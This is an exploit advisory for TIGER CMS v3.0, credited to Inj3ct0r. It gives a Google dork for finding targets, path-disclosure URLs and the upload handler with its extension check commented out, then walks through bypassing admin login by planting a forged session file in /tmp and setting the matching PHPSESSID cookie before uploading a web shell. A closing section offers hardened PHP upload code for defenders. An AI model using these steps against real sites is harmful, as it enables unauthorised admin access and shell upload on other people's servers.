==========================================
TIGER CMS <= v3.0 Bypass admin / get shell
==========================================

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

Product : TIGER CMS
Version : v3.0
Site : http://tigercms.com/
Dork : "Powered by TIGER CMS v3.0"

Path Disclosure

Sample: http://bobruisk.name/admin/engine/modules/uploads/
Usage: http://site.com/path/admin/engine/modules/[module_name]

Standard modules that are suitable for this purpose:

uploads
content
links
metatags
news
pass
templates

Arbitrary file upload

It is unclear why, but the whole problem comes down to two lines in the default code (the commented-out extension check).

PHP code:

    $type = strtolower(substr($filename, 1 + strrpos($filename, ".")));
    // The extension allow-list and its check are commented out, so any file type is accepted.
    // (The message text means "Invalid file format.")
    //$types_ok = array("jpg", "bmp", "gif", "png");
    //if(!in_array($type, $types_ok)) $Validate->Locate("javascript:window.close();", 0, 1, "Неверный формат файла.");
    $new_name = 'tiger-'.time().'.'.$type;
    $a = copy($file, "../uploads/".$new_name);
    $path_all = getenv("SERVER_NAME");

Example: http://site.com/path/admin/?task=uploads&sub_task=add

Bypassing authentication to the admin panel

Requirements:

A shell on a neighboring site
Write access to /tmp

Vulnerable code: admin/login/login2.php

PHP code:

    $_SESSION['user_id_admin'] = $id_admin;
    $Admins->SuccessAuth($login);

For a successful login, we will need the admin's login name.
I would venture to suggest that it is "admin".

The session looks like this:

Name: sess_0526152ea0fed5dbbfca86639e0f6fa7
Contents: user_id_admin|s:1:"1";

It is kept in /tmp. Do not forget to set the permissions to 777!

Next, forge the cookie in your browser:

PHPSESSID=0526152ea0fed5dbbfca86639e0f6fa7

Go to http://site.com/path/admin/; authentication is passed successfully, and the shell is uploaded as described above.

ThE End =]
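
For defenders, the upload snippet quoted in the arbitrary file upload section can be closed by restoring the extension check and tightening the rest of the handler. The following is an added example, not TIGER CMS code: store_upload(), ALLOWED_TYPES and $uploadDir are hypothetical names, and the MIME values listed for each extension are an assumption about what libmagic reports.

```php
<?php
// Added example (not from TIGER CMS): hardened form of the upload handler.
// store_upload(), ALLOWED_TYPES and $uploadDir are hypothetical names.

// Extension allow-list, each mapped to the content types accepted for it.
const ALLOWED_TYPES = [
    'jpg' => ['image/jpeg'],
    'gif' => ['image/gif'],
    'png' => ['image/png'],
    'bmp' => ['image/bmp', 'image/x-ms-bmp'],
];

// $file is one entry of $_FILES; returns the stored file name.
function store_upload(array $file, string $uploadDir): string
{
    // Accept only a file that PHP itself received over HTTP POST.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed.');
    }

    // The check that the original code ships commented out.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        throw new RuntimeException('File type not allowed.');
    }

    // The extension is client-controlled, so the detected content
    // type must also match what the allow-list expects for it.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_TYPES[$ext], true)) {
        throw new RuntimeException('File content does not match its extension.');
    }

    // Random server-chosen name instead of time(); the extension is
    // taken from the allow-list key, never from raw user input.
    $newName = 'tiger-' . bin2hex(random_bytes(16)) . '.' . $ext;
    $target  = rtrim($uploadDir, '/') . '/' . $newName;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store the file.');
    }
    return $newName;
}
```

Serving the upload directory with script execution disabled keeps a stored file from running even if one of these checks is bypassed.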